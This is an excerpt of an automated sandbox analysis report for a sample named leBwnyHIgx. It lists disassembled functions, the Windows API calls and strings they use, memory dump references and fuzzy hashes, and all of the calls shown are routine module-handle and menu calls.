                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                    • String ID: Detected restart. Removing temporary directory.
                                                                                    • API String ID: 1717587489-3199836293
                                                                                    • Opcode ID: 6f776ffacad2af89d35688e394897bf6e83705840bcb12dca368fa9c17a4540f
                                                                                    • Instruction ID: 464bd2d836879dd3474a0288fef1e2a55e7a5b05e4adc84fe2957298e905eb94
                                                                                    • Opcode Fuzzy Hash: 6f776ffacad2af89d35688e394897bf6e83705840bcb12dca368fa9c17a4540f
                                                                                    • Instruction Fuzzy Hash: F1E0ABB52483402EF39137F6BC13A5B3F4EE7C7362F61043AFA0481441CC599864C138
                                                                                    Function 005B1C48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,?,00000004,006619DC,006006F2,00600B6C,00600610,?,00000B06,00000000,00000000), ref: 005B1C62
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                      • Part of subcall function 005B1BAC: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005B1CA2,?,00000004,006619DC,006006F2,00600B6C,00600610,?,00000B06,00000000,00000000), ref: 005B1BC3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule$AddressProc
                                                                                    • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                    • API String ID: 1883125708-2676053874
                                                                                    • Opcode ID: 6878c14f71f69b0723f96bc96d4fcaf4194bacb9fe624374ffc45413c8f78ab0
                                                                                    • Instruction ID: 9df0a5d5a98339ba50c13b8e37e12c07401c504aaeadd98406a6411a3d2f2949
                                                                                    • Opcode Fuzzy Hash: 6878c14f71f69b0723f96bc96d4fcaf4194bacb9fe624374ffc45413c8f78ab0
                                                                                    • Instruction Fuzzy Hash: 6DF05C302B07109FD7416F659C44FD53EADFB44342F401924F504962A0C7F41C80C76C
                                                                                    Function 005B1CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005B1D88: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005B1D06,?,?,?,0064F751,0000000A,00000002,00000001,00000031,00000000,0064F97F), ref: 005B1D96
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,?,?,0064F751,0000000A,00000002,00000001,00000031,00000000,0064F97F,?,00000000,0064FA4C), ref: 005B1D10
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule$AddressProc
                                                                                    • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                    • API String ID: 1883125708-2866557904
                                                                                    • Opcode ID: e7dab807d206312efdb0421e04762fd5465d9bb62d82bfaba76103e697829b8c
                                                                                    • Instruction ID: 40c05ee6389ba05014c80f0bb6a4273d02a3409cfaf78f9ef14993339606f823
                                                                                    • Opcode Fuzzy Hash: e7dab807d206312efdb0421e04762fd5465d9bb62d82bfaba76103e697829b8c
                                                                                    • Instruction Fuzzy Hash: 14E0C2633A1E512E538072FA2CA1CEF088C9DA6A5A3900C36F505E3152D948DC02017D
                                                                                    Function 005B09F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,005F8CBC,00000000,005F8D8E,?,?,0066978C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B0A0A
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                    • API String ID: 1646373207-1816364905
                                                                                    • Opcode ID: c75330aa7c8c5df12c7e8eb959d8e15b84fad59c46a3f443c355cdc9ba688192
                                                                                    • Instruction ID: 6e2db57afe9603e13bbcb28d8d27c56aba657c1237ebb3fd90a72f709f2b52c2
                                                                                    • Opcode Fuzzy Hash: c75330aa7c8c5df12c7e8eb959d8e15b84fad59c46a3f443c355cdc9ba688192
                                                                                    • Instruction Fuzzy Hash: AEE0266178070013DB00A2BA4D83EEF158A5B94700F105C3D7999D62D2EDBCE88082A2
                                                                                    Function 00586704 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreatePopupMenu.USER32(?,00586606,?,?,00000000,?,00586587,?,0058BE31,0059C47C), ref: 00586722
                                                                                    • CreateMenu.USER32 ref: 0058672F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateMenu$Popup
                                                                                    • String ID: HOX
                                                                                    • API String ID: 257293969-2476314470
                                                                                    • Opcode ID: 3fef10723f1ca8ff26ecb47d99a67e8efce527985917f034024353e37165076f
                                                                                    • Instruction ID: 16515f4fc79d7f94603b2a7c1aa1a4c0f70e6e138b00580e915dac0b9c35f144
                                                                                    • Opcode Fuzzy Hash: 3fef10723f1ca8ff26ecb47d99a67e8efce527985917f034024353e37165076f
                                                                                    • Instruction Fuzzy Hash: F5F0C930604201CFDB00BF66D5C9B887B92BB55308F8454B9AC45AF25BD77488448FB1
                                                                                    Function 005B1BAC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005B1CA2,?,00000004,006619DC,006006F2,00600B6C,00600610,?,00000B06,00000000,00000000), ref: 005B1BC3
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                    • API String ID: 1646373207-2498399450
                                                                                    • Opcode ID: 32f4064eec838c34c8f47ef9a1994eb5c6ace0f1976ee1f6d02c9e7c94af625d
                                                                                    • Instruction ID: 8c40f62a632f2fa97ec710fedad9e0295ca43648f38e841b9d187b64430073cf
                                                                                    • Opcode Fuzzy Hash: 32f4064eec838c34c8f47ef9a1994eb5c6ace0f1976ee1f6d02c9e7c94af625d
                                                                                    • Instruction Fuzzy Hash: 5DE09A75220700DFD781AF64AC88FDA3FE9F708B01F002819F544921A0D6F818C0CA28
                                                                                    Function 005B1D88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005B1D06,?,?,?,0064F751,0000000A,00000002,00000001,00000031,00000000,0064F97F), ref: 005B1D96
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                    • API String ID: 1646373207-260599015
                                                                                    • Opcode ID: 2d118afa1acb73877a63b6e6f87aa342629fa191858680dbd20951d3b7f32472
                                                                                    • Instruction ID: cfd2a97203f557c8c57e6b3927d22065e7e78818251efbac2aa6542449ac9364
                                                                                    • Opcode Fuzzy Hash: 2d118afa1acb73877a63b6e6f87aa342629fa191858680dbd20951d3b7f32472
                                                                                    • Instruction Fuzzy Hash: 23D0A763351F222E179022F51EE1CEB068C9D242963440136FA00D2100D544DC4012AC
                                                                                    Function 00651170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0065C502,00000001,00000000,0065C528), ref: 0065117A
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                    • API String ID: 1646373207-834958232
                                                                                    • Opcode ID: 03da989b8c341b0011cf5f2f54663901e78246e972d77ad5a530f748acd43f17
                                                                                    • Instruction ID: 5f29c36bf5ef2573be6bf32c1ba0481e8d956120234237a4d8ff77b8e3f328bd
                                                                                    • Opcode Fuzzy Hash: 03da989b8c341b0011cf5f2f54663901e78246e972d77ad5a530f748acd43f17
                                                                                    • Instruction Fuzzy Hash: C3B01265281F00310B7033F30F43FDB044A0C93B4BF0245D97F00D9092CD58C0490039